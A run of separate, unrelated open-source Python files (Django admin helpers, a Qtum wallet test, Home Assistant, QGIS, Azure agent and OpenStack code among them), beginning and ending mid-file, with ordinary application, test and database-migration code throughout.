__init__(self, inline, formset, fieldsets, readonly_fields=None, model_admin=None): self.opts = inline self.formset = formset self.fieldsets = fieldsets self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields def __iter__(self): for form, original in zip(self.formset.initial_forms, self.formset.get_queryset()): yield InlineAdminForm(self.formset, form, self.fieldsets, self.opts.prepopulated_fields, original, self.readonly_fields, model_admin=self.model_admin) for form in self.formset.extra_forms: yield InlineAdminForm(self.formset, form, self.fieldsets, self.opts.prepopulated_fields, None, self.readonly_fields, model_admin=self.model_admin) yield InlineAdminForm(self.formset, self.formset.empty_form, self.fieldsets, self.opts.prepopulated_fields, None, self.readonly_fields, model_admin=self.model_admin) def fields(self): fk = getattr(self.formset, "fk", None) for i, field in enumerate(flatten_fieldsets(self.fieldsets)): if fk and fk.name == field: continue if field in self.readonly_fields: yield { 'label': label_for_field(field, self.opts.model, self.model_admin), 'widget': { 'is_hidden': False }, 'required': False } else: yield self.formset.form.base_fields[field] def _media(self): media = self.opts.media + self.formset.media for fs in self: media = media + fs.media return media media = property(_media) class InlineAdminForm(AdminForm): """ A wrapper around an inline form for use in the admin system. """ def __init__(self, formset, form, fieldsets, prepopulated_fields, original, readonly_fields=None, model_admin=None): self.formset = formset self.model_admin = model_admin self.original = original if original is not None: self.original_content_type_id = ContentType.objects.get_for_model(original).pk self.show_url = original and hasattr(original, 'get_absolute_url') super(InlineAdminForm, self).__init__(form, fieldsets, prepopulated_fields, readonly_fields, model_admin) def __iter__(self): for name, options in self.fieldsets: yield InlineFieldset(self.formset, self.form, name, self.readonly_fields, model_admin=self.model_admin, **options) def has_auto_field(self): if self.form._meta.model._meta.has_auto_field: return True # Also search any parents for an auto field. for parent in self.form._meta.model._meta.get_parent_list(): if parent._meta.has_auto_field: return True return False def field_count(self): # tabular.html uses this function for colspan value. num_of_fields = 0 if self.has_auto_field(): num_of_fields += 1 num_of_fields += len(self.fieldsets[0][1]["fields"]) if self.formset.can_order: num_of_fields += 1 if self.formset.can_delete: num_of_fields += 1 return num_of_fields def pk_field(self): return AdminField(self.form, self.formset._pk_field.name, False) def fk_field(self): fk = getattr(self.formset, "fk", None) if fk: return AdminField(self.form, fk.name, False) else: return "" def deletion_field(self): from django.forms.formsets import DELETION_FIELD_NAME return AdminField(self.form, DELETION_FIELD_NAME, False) def ordering_field(self): from django.forms.formsets import ORDERING_FIELD_NAME return AdminField(self.form, ORDERING_FIELD_NAME, False) class InlineFieldset(Fieldset): def __init__(self, formset, *args, **kwargs): self.formset = formset super(InlineFieldset, self).__init__(*args, **kwargs) def __iter__(self): fk = getattr(self.formset, "fk", None) for field in self.fields: if fk and fk.name == field: continue yield Fieldline(self.form, field, self.readonly_fields, model_admin=self.model_admin) class AdminErrorList(forms.util.ErrorList): """ Stores all errors for the form/formsets in an add/change stage view. """ def __init__(self, form, inline_formsets): if form.is_bound: self.extend(form.errors.values()) for inline_formset in inline_formsets: self.extend(inline_formset.non_form_errors()) for errors_in_inline_form in inline_formset.errors: self.extend(errors_in_inline_form.values()) def normalize_fieldsets(fieldsets): """ Make sure the keys in fieldset dictionaries are strings. Returns the normalized data. """ result = [] for name, options in fieldsets: result.append((name, normalize_dictionary(options))) return result def normalize_dictionary(data_dict): """ Converts all the keys in "data_dict" to strings. The keys must be convertible using str(). """ for key, value in data_dict.items(): if not isinstance(key, str): del data_dict[key] data_dict[str(key)] = value return data_dict
#!/usr/bin/env python3 # Copyright (c) 2018-2019 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test wallet group functionality.""" from test_framework.test_framework import BitcoinTestFramework from test_framework.messages import CTransaction, FromHex, ToHex from test_framework.util import ( assert_approx, assert_equal, ) from test_framework.qtumconfig import COINBASE_MATURITY, MAX_BLOCK_SIGOPS from test_framework.qtum import generatesynchronized class WalletGroupTest(BitcoinTestFramework): def set_test_params(self): self.setup_clean_chain = True self.num_nodes = 3 self.extra_args = [[], [], ['-avoidpartialspends']] self.rpc_timewait = 120 def skip_test_if_missing_module(self): self.skip_if_no_wallet() def run_test(self): # Mine some coins generatesynchronized(self.nodes[0], 10+COINBASE_MATURITY, None, self.nodes) # Get some addresses from the two nodes addr1 = [self.nodes[1].getnewaddress() for i in range(3)] addr2 = [self.nodes[2].getnewaddress() for i in range(3)] addrs = addr1 + addr2 # Send 1 + 0.5 coin to each address [self.nodes[0].sendtoaddress(addr, 1.0) for addr in addrs] [self.nodes[0].sendtoaddress(addr, 0.5) for addr in addrs] self.nodes[0].generate(1) self.sync_all() # For each node, send 0.2 coins back to 0; # - node[1] should pick one 0.5 UTXO and leave the rest # - node[2] should pick one (1.0 + 0.5) UTXO group corresponding to a # given address, and leave the rest txid1 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 0.2) tx1 = self.nodes[1].getrawtransaction(txid1, True) # txid1 should have 1 input and 2 outputs assert_equal(1, len(tx1["vin"])) assert_equal(2, len(tx1["vout"])) # one output should be 0.2, the other should be ~0.3 v = [vout["value"] for vout in tx1["vout"]] v.sort() assert_approx(v[0], 0.2) assert_approx(v[1], 0.3, 0.01) txid2 = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 0.2) tx2 = self.nodes[2].getrawtransaction(txid2, True) # txid2 should have 2 inputs and 2 outputs assert_equal(2, len(tx2["vin"])) assert_equal(2, len(tx2["vout"])) # one output should be 0.2, the other should be ~1.3 v = [vout["value"] for vout in tx2["vout"]] v.sort() assert_approx(v[0], 0.2) assert_approx(v[1], 1.3, 0.01) # Empty out node2's wallet self.nodes[2].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=self.nodes[2].getbalance(), subtractfeefromamount=True) self.sync_all() self.nodes[0].generate(1) # Fill node2's wallet with 10000 outputs corresponding to the same # scriptPubKey for i in range(10): raw_tx = self.nodes[0].createrawtransaction([{"txid":"0"*64, "vout":0}], [{addr2[0]: 10/(MAX_BLOCK_SIGOPS//10)}]) tx = FromHex(CTransaction(), raw_tx) tx.vin = [] tx.vout = [tx.vout[0]] * (MAX_BLOCK_SIGOPS//10) funded_tx = self.nodes[0].fundrawtransaction(ToHex(tx)) signed_tx = self.nodes[0].signrawtransactionwithwallet(funded_tx['hex']) self.nodes[0].sendrawtransaction(signed_tx['hex']) self.nodes[0].generate(1) self.sync_all() # Check that we can create a transaction that only requires ~100 of our # utxos, without pulling in all outputs and creating a transaction that # is way too big. assert self.nodes[2].sendtoaddress(address=addr2[0], amount=5) if __name__ == '__main__': WalletGroupTest().main()
#!/usr/bin/env python # add as a cron job: # # crontab -e # add the following line: # 30 3 * * * /[...]/periodic-stats-update.py import psycopg2, psycopg2.extras, sys from datetime import datetime DB_NAME = 'twitterdb' DB_USER = 'twitter' class StatsUpdater(object): def log(self, s, prefix="StatsUpdater: "): if prefix: s = prefix + s sys.stdout.write(s) sys.stdout.flush() def run(self): self.conn = psycopg2.connect(dbname=DB_NAME, user=DB_USER) self.cursor = self.conn.cursor(cursor_factory=psycopg2.extras.DictCursor) try: self.log("Connected to database.\n") last_stats = self.get_last_stats_record() now = datetime.now() self.log("Computing num tweets emitted... ") num_tweets_emitted = self.get_num_tweets_emitted() self.log("done\n", prefix=None) self.log("Computing num tweets captured... ") num_tweets_captured = self.get_num_tweets_captured(last_stats, now) self.log("done\n", prefix=None) self.update_stats(last_stats['period_id'], now, num_tweets_emitted, num_tweets_captured) self.log("Stats saved in database.\n") finally: self.cursor.close() self.conn.close() def get_1st_record(self, query, query_params=()): self.cursor.execute(query, query_params) return self.cursor.fetchall()[0] def get_last_stats_record(self): query = """ select * from stats_per_period where period_id = ( select max(period_id) from stats_per_period);""" return self.get_1st_record(query) def get_num_tweets_emitted(self): """return the number of tweets emitted since the last check period""" # sum the numbers we reported in previous periods query = """ select sum(num_tweets_emitted) from stats_per_period;""" old_count = self.get_1st_record(query)[0] # get the number of statuses emitted by users from the time # we started to collect, using the 'statuses_count' information query = """ select sum(l.statuses_count - f.statuses_count +1) from twitter_user u, user_stats f, user_stats l where u.stats_first_seen = f.user_stats_id and u.stats_now = l.user_stats_id;""" new_count = self.get_1st_record(query)[0] return new_count - old_count def get_num_tweets_captured(self, last_stats, now): """return the number of tweets captured since the last check period""" query = """ select count(*) from tweet where created_at >= %s and created_at < %s""" params = (last_stats['end_of_period'], now) return self.get_1st_record(query, params)[0] def update_stats(self, last_period_id, now, num_tweets_emitted, num_tweets_captured): query = """ insert into stats_per_period( last_period_id, end_of_period, num_tweets_emitted, num_tweets_captured) values (%s,%s,%s,%s);""" self.cursor.execute(query, (last_period_id, now, num_tweets_emitted, num_tweets_captured)) self.conn.commit() return if __name__ == '__main__': updater = StatsUpdater() updater.run()
# -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2017-02-06 08:23 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('hkm', '0003_productorder_product_name'), ] operations = [ migrations.RemoveField( model_name='productorder', name='crop_image_height', ), migrations.RemoveField( model_name='productorder', name='crop_image_width', ), migrations.AddField( model_name='productorder', name='original_height', field=models.IntegerField(blank=True, null=True, verbose_name='Original image height'), ), migrations.AddField( model_name='productorder', name='original_width', field=models.IntegerField(blank=True, null=True, verbose_name='Original image width'), ), migrations.AlterField( model_name='productorder', name='crop_x', field=models.IntegerField(blank=True, null=True, verbose_name='Crop x coordinate from left'), ), migrations.AlterField( model_name='productorder', name='crop_y', field=models.IntegerField(blank=True, null=True, verbose_name='Crop y coordinate from top'), ), ]
""" homeassistant.components.thermostat.heatmiser ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Adds support for the PRT Heatmiser themostats using the V3 protocol. See https://github.com/andylockran/heatmiserV3 for more info on the heatmiserV3 module dependency. For more details about this platform, please refer to the documentation at https://home-assistant.io/components/thermostat.heatmiser/ """ import logging from homeassistant.components.thermostat import ThermostatDevice from homeassistant.const import TEMP_CELCIUS CONF_IPADDRESS = 'ipaddress' CONF_PORT = 'port' CONF_TSTATS = 'tstats' REQUIREMENTS = ["heatmiserV3==0.9.1"] _LOGGER = logging.getLogger(__name__) def setup_platform(hass, config, add_devices, discovery_info=None): """ Sets up the heatmiser thermostat. """ from heatmiserV3 import heatmiser, connection ipaddress = str(config[CONF_IPADDRESS]) port = str(config[CONF_PORT]) if ipaddress is None or port is None: _LOGGER.error("Missing required configuration items %s or %s", CONF_IPADDRESS, CONF_PORT) return False serport = connection.connection(ipaddress, port) serport.open() tstats = [] if CONF_TSTATS in config: tstats = config[CONF_TSTATS] if tstats is None: _LOGGER.error("No thermostats configured.") return False for tstat in tstats: add_devices([ HeatmiserV3Thermostat( heatmiser, tstat.get("id"), tstat.get("name"), serport) ]) return class HeatmiserV3Thermostat(ThermostatDevice): """ Represents a HeatmiserV3 thermostat. """ # pylint: disable=too-many-instance-attributes def __init__(self, heatmiser, device, name, serport): self.heatmiser = heatmiser self.device = device self.serport = serport self._current_temperature = None self._name = name self._id = device self.dcb = None self.update() self._target_temperature = int(self.dcb.get("roomset")) @property def name(self): """ Returns the name of the honeywell, if any. """ return self._name @property def unit_of_measurement(self): """ Unit of measurement this thermostat uses.""" return TEMP_CELCIUS @property def current_temperature(self): """ Returns the current temperature. """ if self.dcb is not None: low = self.dcb.get("floortemplow ") high = self.dcb.get("floortemphigh") temp = (high*256 + low)/10.0 self._current_temperature = temp else: self._current_temperature = None return self._current_temperature @property def target_temperature(self): """ Returns the temperature we try to reach. """ return self._target_temperature def set_temperature(self, temperature): """ Set new target temperature """ temperature = int(temperature) self.heatmiser.hmSendAddress( self._id, 18, temperature, 1, self.serport) self._target_temperature = int(temperature) def update(self): self.dcb = self.heatmiser.hmReadAddress( self._id, 'prt', self.serport)
import os from setuptools import setup, find_packages here = os.path.abspath(os.path.dirname(__file__)) try: readme = open(os.path.join(here, 'README.md')).read() except IOError: readme = '' install_requires = [ 'era>=1.1', ] setup_requires = [ 'coverage>=3.7.0', 'nose>=1.3.0', ] setup( name='bearform', version='1.2', description="Easy data conversion and validation for frontends.", long_description=readme, classifiers=[ "Intended Audience :: Developers", "Programming Language :: Python", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.7", "License :: OSI Approved :: BSD License", ], keywords='python json frontend validation', author='WiFast', author_email='[email protected]', url='https://github.com/WiFast/bearform', license='BSD-derived', zip_safe=False, packages=find_packages(exclude=['tests']), include_package_data=True, install_requires=install_requires, setup_requires=setup_requires, test_suite = 'nose.collector', entry_points='', )
# -*- coding: utf-8 -*- """ *************************************************************************** OpenModelFromFileAction.py --------------------- Date : February 2018 Copyright : (C) 2018 by Nyall Dawson Email : nyall dot dawson at gmail dot com *************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * *************************************************************************** """ __author__ = 'Nyall Dawson' __date__ = 'February 2018' __copyright__ = '(C) 2018, Nyall Dawson' # This will get replaced with a git SHA1 when you do a git archive __revision__ = '$Format:%H$' import os from qgis.PyQt.QtWidgets import QFileDialog from qgis.PyQt.QtCore import QFileInfo, QCoreApplication from qgis.core import QgsApplication, QgsSettings from processing.gui.ToolboxAction import ToolboxAction from processing.modeler.ModelerDialog import ModelerDialog pluginPath = os.path.split(os.path.dirname(__file__))[0] class OpenModelFromFileAction(ToolboxAction): def __init__(self): self.name = QCoreApplication.translate('OpenModelFromFileAction', 'Open Existing Model…') self.group = self.tr('Tools') def getIcon(self): return QgsApplication.getThemeIcon("/processingModel.svg") def execute(self): settings = QgsSettings() lastDir = settings.value('Processing/lastModelsDir', '') filename, selected_filter = QFileDialog.getOpenFileName(self.toolbox, self.tr('Open Model', 'AddModelFromFileAction'), lastDir, self.tr('Processing model files (*.model3 *.MODEL3)', 'AddModelFromFileAction')) if filename: settings.setValue('Processing/lastModelsDir', QFileInfo(filename).absoluteDir().absolutePath()) dlg = ModelerDialog() dlg.loadModel(filename) dlg.show()
#!/usr/bin/python from azuremodules import * import argparse import os parser = argparse.ArgumentParser() parser.add_argument('-wl', '--whitelist', help='specify the xml file which contains the ignorable errors') args = parser.parse_args() white_list_xml = args.whitelist def RunTest(): UpdateState("TestRunning") RunLog.info("Checking for ERROR messages in waagent.log...") errors = Run("grep ERROR /var/log/waagent.log") if (not errors) : RunLog.info('There is no errors in the logs waagent.log') ResultLog.info('PASS') UpdateState("TestCompleted") else : if white_list_xml and os.path.isfile(white_list_xml): try: import xml.etree.cElementTree as ET except ImportError: import xml.etree.ElementTree as ET white_list_file = ET.parse(white_list_xml) xml_root = white_list_file.getroot() RunLog.info('Checking ignorable walalog ERROR messages...') for node in xml_root: if (errors and node.tag == "errors"): for keywords in node: if(errors): errors = RemoveIgnorableMessages(''.join(errors), keywords.text) if (errors): RunLog.info('ERROR are present in wala log.') RunLog.info('Errors: ' + ''.join(errors)) ResultLog.error('FAIL') else: ResultLog.info('PASS') UpdateState("TestCompleted") def RemoveIgnorableMessages(messages, keywords): matchstring = re.findall(keywords,messages,re.M) matchcount = 0 index = 0 if(matchstring): for msg in matchstring: RunLog.info('Ignorable ERROR message:\n' + msg) matchcount += 1 while matchcount > 0: matchcount -= 1 messages = messages.replace(matchstring[index],'') index += 1 valid_list = [] if re.search('error', messages, re.IGNORECASE): valid_list.append(messages) if len(valid_list) > 0: return valid_list else: return None else: return messages RunTest()
import os from subprocess import Popen from gi.repository import Nautilus, GObject class OpenInDvmItemExtension(GObject.GObject, Nautilus.MenuProvider): '''Open File(s) in DisposableVM. Uses the nautilus-python api to provide a context menu within Nautilus which will enable the user to select file(s) to to open in a disposableVM ''' def get_file_items(self, window, files): '''Attaches context menu in Nautilus ''' if not files: return menu_item = Nautilus.MenuItem(name='QubesMenuProvider::OpenInDvm', label='Open In DisposableVM', tip='', icon='') menu_item.connect('activate', self.on_menu_item_clicked, files) return menu_item, def on_menu_item_clicked(self, menu, files): '''Called when user chooses files though Nautilus context menu. ''' for file_obj in files: # Check if file still exists if file_obj.is_gone(): return gio_file = file_obj.get_location() # Use subprocess.DEVNULL in python >= 3.3 devnull = open(os.devnull, 'wb') # Use Popen instead of subprocess.call to spawn the process Popen(['nohup', '/usr/bin/qvm-open-in-dvm', gio_file.get_path()], stdout=devnull, stderr=devnull)
from chatterbot import ChatBot import tkinter as tk try: import ttk as ttk import ScrolledText except ImportError: import tkinter.ttk as ttk import tkinter.scrolledtext as ScrolledText import time class TkinterGUIExample(tk.Tk): def __init__(self, *args, **kwargs): """ Create & set window variables. """ tk.Tk.__init__(self, *args, **kwargs) self.chatbot = ChatBot( "GUI Bot", storage_adapter="chatterbot.storage.SQLStorageAdapter", logic_adapters=[ "chatterbot.logic.BestMatch" ], database_uri="sqlite:///database.sqlite3" ) self.title("Chatterbot") self.initialize() def initialize(self): """ Set window layout. """ self.grid() self.respond = ttk.Button(self, text='Get Response', command=self.get_response) self.respond.grid(column=0, row=0, sticky='nesw', padx=3, pady=3) self.usr_input = ttk.Entry(self, state='normal') self.usr_input.grid(column=1, row=0, sticky='nesw', padx=3, pady=3) self.conversation_lbl = ttk.Label(self, anchor=tk.E, text='Conversation:') self.conversation_lbl.grid(column=0, row=1, sticky='nesw', padx=3, pady=3) self.conversation = ScrolledText.ScrolledText(self, state='disabled') self.conversation.grid(column=0, row=2, columnspan=2, sticky='nesw', padx=3, pady=3) def get_response(self): """ Get a response from the chatbot and display it. """ user_input = self.usr_input.get() self.usr_input.delete(0, tk.END) response = self.chatbot.get_response(user_input) self.conversation['state'] = 'normal' self.conversation.insert( tk.END, "Human: " + user_input + "\n" + "ChatBot: " + str(response.text) + "\n" ) self.conversation['state'] = 'disabled' time.sleep(0.5) gui_example = TkinterGUIExample() gui_example.mainloop()
# Copyright 2011 OpenStack Foundation. # All Rights Reserved. # Copyright 2013 eNovance # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import contextlib import eventlet import threading import mock import testscenarios from oslo.messaging._executors import impl_blocking from oslo.messaging._executors import impl_eventlet from tests import utils as test_utils load_tests = testscenarios.load_tests_apply_scenarios class TestExecutor(test_utils.BaseTestCase): _impl = [('blocking', dict(executor=impl_blocking.BlockingExecutor, stop_before_return=True)), ('eventlet', dict(executor=impl_eventlet.EventletExecutor, stop_before_return=False))] @classmethod def generate_scenarios(cls): cls.scenarios = testscenarios.multiply_scenarios(cls._impl) @staticmethod def _run_in_thread(executor): def thread(): executor.start() executor.wait() thread = threading.Thread(target=thread) thread.daemon = True thread.start() thread.join(timeout=30) def test_executor_dispatch(self): callback = mock.MagicMock(return_value='result') class Dispatcher(object): @contextlib.contextmanager def __call__(self, incoming): yield lambda: callback(incoming.ctxt, incoming.message) listener = mock.Mock(spec=['poll']) executor = self.executor(self.conf, listener, Dispatcher()) incoming_message = mock.MagicMock(ctxt={}, message={'payload': 'data'}) def fake_poll(): if self.stop_before_return: executor.stop() return incoming_message else: if listener.poll.call_count == 1: return incoming_message executor.stop() listener.poll.side_effect = fake_poll self._run_in_thread(executor) callback.assert_called_once_with({}, {'payload': 'data'}) TestExecutor.generate_scenarios() class ExceptedException(Exception): pass class EventletContextManagerSpawnTest(test_utils.BaseTestCase): def setUp(self): super(EventletContextManagerSpawnTest, self).setUp() self.before = mock.Mock() self.callback = mock.Mock() self.after = mock.Mock() self.exception_call = mock.Mock() @contextlib.contextmanager def context_mgr(): self.before() try: yield lambda: self.callback() except ExceptedException: self.exception_call() self.after() self.mgr = context_mgr() def test_normal_run(self): thread = impl_eventlet.spawn_with(self.mgr, pool=eventlet) thread.wait() self.assertEqual(self.before.call_count, 1) self.assertEqual(self.callback.call_count, 1) self.assertEqual(self.after.call_count, 1) self.assertEqual(self.exception_call.call_count, 0) def test_excepted_exception(self): self.callback.side_effect = ExceptedException thread = impl_eventlet.spawn_with(self.mgr, pool=eventlet) try: thread.wait() except ExceptedException: pass self.assertEqual(self.before.call_count, 1) self.assertEqual(self.callback.call_count, 1) self.assertEqual(self.after.call_count, 1) self.assertEqual(self.exception_call.call_count, 1) def test_unexcepted_exception(self): self.callback.side_effect = Exception thread = impl_eventlet.spawn_with(self.mgr, pool=eventlet) try: thread.wait() except Exception: pass self.assertEqual(self.before.call_count, 1) self.assertEqual(self.callback.call_count, 1) self.assertEqual(self.after.call_count, 0) self.assertEqual(self.exception_call.call_count, 0)
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # Copyright 2010-2011 OpenStack Foundation. # Copyright 2012 Justin Santa Barbara # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import re from migrate.changeset import UniqueConstraint import sqlalchemy from sqlalchemy import Boolean from sqlalchemy import CheckConstraint from sqlalchemy import Column from sqlalchemy.engine import reflection from sqlalchemy.ext.compiler import compiles from sqlalchemy import func from sqlalchemy import Index from sqlalchemy import Integer from sqlalchemy import MetaData from sqlalchemy.sql.expression import literal_column from sqlalchemy.sql.expression import UpdateBase from sqlalchemy.sql import select from sqlalchemy import String from sqlalchemy import Table from sqlalchemy.types import NullType from keystone.openstack.common.gettextutils import _ # noqa from keystone.openstack.common import log as logging from keystone.openstack.common import timeutils LOG = logging.getLogger(__name__) _DBURL_REGEX = re.compile(r"[^:]+://([^:]+):([^@]+)@.+") def sanitize_db_url(url): match = _DBURL_REGEX.match(url) if match: return '%s****:****%s' % (url[:match.start(1)], url[match.end(2):]) return url class InvalidSortKey(Exception): message = _("Sort key supplied was not valid.") # copy from glance/db/sqlalchemy/api.py def paginate_query(query, model, limit, sort_keys, marker=None, sort_dir=None, sort_dirs=None): """Returns a query with sorting / pagination criteria added. Pagination works by requiring a unique sort_key, specified by sort_keys. (If sort_keys is not unique, then we risk looping through values.) We use the last row in the previous page as the 'marker' for pagination. So we must return values that follow the passed marker in the order. With a single-valued sort_key, this would be easy: sort_key > X. With a compound-values sort_key, (k1, k2, k3) we must do this to repeat the lexicographical ordering: (k1 > X1) or (k1 == X1 && k2 > X2) or (k1 == X1 && k2 == X2 && k3 > X3) We also have to cope with different sort_directions. Typically, the id of the last row is used as the client-facing pagination marker, then the actual marker object must be fetched from the db and passed in to us as marker. :param query: the query object to which we should add paging/sorting :param model: the ORM model class :param limit: maximum number of items to return :param sort_keys: array of attributes by which results should be sorted :param marker: the last item of the previous page; we returns the next results after this value. :param sort_dir: direction in which results should be sorted (asc, desc) :param sort_dirs: per-column array of sort_dirs, corresponding to sort_keys :rtype: sqlalchemy.orm.query.Query :return: The query with sorting/pagination added. """ if 'id' not in sort_keys: # TODO(justinsb): If this ever gives a false-positive, check # the actual primary key, rather than assuming its id LOG.warn(_('Id not in sort_keys; is sort_keys unique?')) assert(not (sort_dir and sort_dirs)) # Default the sort direction to ascending if sort_dirs is None and sort_dir is None: sort_dir = 'asc' # Ensure a per-column sort direction if sort_dirs is None: sort_dirs = [sort_dir for _sort_key in sort_keys] assert(len(sort_dirs) == len(sort_keys)) # Add sorting for current_sort_key, current_sort_dir in zip(sort_keys, sort_dirs): try: sort_dir_func = { 'asc': sqlalchemy.asc, 'desc': sqlalchemy.desc, }[current_sort_dir] except KeyError: raise ValueError(_("Unknown sort direction, " "must be 'desc' or 'asc'")) try: sort_key_attr = getattr(model, current_sort_key) except AttributeError: raise InvalidSortKey() query = query.order_by(sort_dir_func(sort_key_attr)) # Add pagination if marker is not None: marker_values = [] for sort_key in sort_keys: v = getattr(marker, sort_key) marker_values.append(v) # Build up an array of sort criteria as in the docstring criteria_list = [] for i in range(0, len(sort_keys)): crit_attrs = [] for j in range(0, i): model_attr = getattr(model, sort_keys[j]) crit_attrs.append((model_attr == marker_values[j])) model_attr = getattr(model, sort_keys[i]) if sort_dirs[i] == 'desc': crit_attrs.append((model_attr < marker_values[i])) else: crit_attrs.append((model_attr > marker_values[i])) criteria = sqlalchemy.sql.and_(*crit_attrs) criteria_list.append(criteria) f = sqlalchemy.sql.or_(*criteria_list) query = query.filter(f) if limit is not None: query = query.limit(limit) return query def get_table(engine, name): """Returns an sqlalchemy table dynamically from db. Needed because the models don't work for us in migrations as models will be far out of sync with the current data. """ metadata = MetaData() metadata.bind = engine return Table(name, metadata, autoload=True) class InsertFromSelect(UpdateBase): """Form the base for `INSERT INTO table (SELECT ... )` statement.""" def __init__(self, table, select): self.table = table self.select = select @compiles(InsertFromSelect) def visit_insert_from_select(element, compiler, **kw): """Form the `INSERT INTO table (SELECT ... )` statement.""" return "INSERT INTO %s %s" % ( compiler.process(element.table, asfrom=True), compiler.process(element.select)) class ColumnError(Exception): """Error raised when no column or an invalid column is found.""" def _get_not_supported_column(col_name_col_instance, column_name): try: column = col_name_col_instance[column_name] except KeyError: msg = _("Please specify column %s in col_name_col_instance " "param. It is required because column has unsupported " "type by sqlite).") raise ColumnError(msg % column_name) if not isinstance(column, Column): msg = _("col_name_col_instance param has wrong type of " "column instance for column %s It should be instance " "of sqlalchemy.Column.") raise ColumnError(msg % column_name) return column def drop_unique_constraint(migrate_engine, table_name, uc_name, *columns, **col_name_col_instance): """Drop unique constraint from table. This method drops UC from table and works for mysql, postgresql and sqlite. In mysql and postgresql we are able to use "alter table" construction. Sqlalchemy doesn't support some sqlite column types and replaces their type with NullType in metadata. We process these columns and replace NullType with the correct column type. :param migrate_engine: sqlalchemy engine :param table_name: name of table that contains uniq constraint. :param uc_name: name of uniq constraint that will be dropped. :param columns: columns that are in uniq constraint. :param col_name_col_instance: contains pair column_name=column_instance. column_instance is instance of Column. These params are required only for columns that have unsupported types by sqlite. For example BigInteger. """ meta = MetaData() meta.bind = migrate_engine t = Table(table_name, meta, autoload=True) if migrate_engine.name == "sqlite": override_cols = [ _get_not_supported_column(col_name_col_instance, col.name) for col in t.columns if isinstance(col.type, NullType) ] for col in override_cols: t.columns.replace(col) uc = UniqueConstraint(*columns, table=t, name=uc_name) uc.drop() def drop_old_duplicate_entries_from_table(migrate_engine, table_name, use_soft_delete, *uc_column_names): """Drop all old rows having the same values for columns in uc_columns. This method drop (or mark ad `deleted` if use_soft_delete is True) old duplicate rows form table with name `table_name`. :param migrate_engine: Sqlalchemy engine :param table_name: Table with duplicates :param use_soft_delete: If True - values will be marked as `deleted`, if False - values will be removed from table :param uc_column_names: Unique constraint columns """ meta = MetaData() meta.bind = migrate_engine table = Table(table_name, meta, autoload=True) columns_for_group_by = [table.c[name] for name in uc_column_names] columns_for_select = [func.max(table.c.id)] columns_for_select.extend(columns_for_group_by) duplicated_rows_select = select(columns_for_select, group_by=columns_for_group_by, having=func.count(table.c.id) > 1) for row in migrate_engine.execute(duplicated_rows_select): # NOTE(boris-42): Do not remove row that has the biggest ID. delete_condition = table.c.id != row[0] is_none = None # workaround for pyflakes delete_condition &= table.c.deleted_at == is_none for name in uc_column_names: delete_condition &= table.c[name] == row[name] rows_to_delete_select = select([table.c.id]).where(delete_condition) for row in migrate_engine.execute(rows_to_delete_select).fetchall(): LOG.info(_("Deleting duplicated row with id: %(id)s from table: " "%(table)s") % dict(id=row[0], table=table_name)) if use_soft_delete: delete_statement = table.update().\ where(delete_condition).\ values({ 'deleted': literal_column('id'), 'updated_at': literal_column('updated_at'), 'deleted_at': timeutils.utcnow() }) else: delete_statement = table.delete().where(delete_condition) migrate_engine.execute(delete_statement) def _get_default_deleted_value(table): if isinstance(table.c.id.type, Integer): return 0 if isinstance(table.c.id.type, String): return "" raise ColumnError(_("Unsupported id columns type")) def _restore_indexes_on_deleted_columns(migrate_engine, table_name, indexes): table = get_table(migrate_engine, table_name) insp = reflection.Inspector.from_engine(migrate_engine) real_indexes = insp.get_indexes(table_name) existing_index_names = dict( [(index['name'], index['column_names']) for index in real_indexes]) # NOTE(boris-42): Restore indexes on `deleted` column for index in indexes: if 'deleted' not in index['column_names']: continue name = index['name'] if name in existing_index_names: column_names = [table.c[c] for c in existing_index_names[name]] old_index = Index(name, *column_names, unique=index["unique"]) old_index.drop(migrate_engine) column_names = [table.c[c] for c in index['column_names']] new_index = Index(index["name"], *column_names, unique=index["unique"]) new_index.create(migrate_engine) def change_deleted_column_type_to_boolean(migrate_engine, table_name, **col_name_col_instance): if migrate_engine.name == "sqlite": return _change_deleted_column_type_to_boolean_sqlite( migrate_engine, table_name, **col_name_col_instance) insp = reflection.Inspector.from_engine(migrate_engine) indexes = insp.get_indexes(table_name) table = get_table(migrate_engine, table_name) old_deleted = Column('old_deleted', Boolean, default=False) old_deleted.create(table, populate_default=False) table.update().\ where(table.c.deleted == table.c.id).\ values(old_deleted=True).\ execute() table.c.deleted.drop() table.c.old_deleted.alter(name="deleted") _restore_indexes_on_deleted_columns(migrate_engine, table_name, indexes) def _change_deleted_column_type_to_boolean_sqlite(migrate_engine, table_name, **col_name_col_instance): insp = reflection.Inspector.from_engine(migrate_engine) table = get_table(migrate_engine, table_name) columns = [] for column in table.columns: column_copy = None if column.name != "deleted": if isinstance(column.type, NullType): column_copy = _get_not_supported_column(col_name_col_instance, column.name) else: column_copy = column.copy() else: column_copy = Column('deleted', Boolean, default=0) columns.append(column_copy) constraints = [constraint.copy() for constraint in table.constraints] meta = table.metadata new_table = 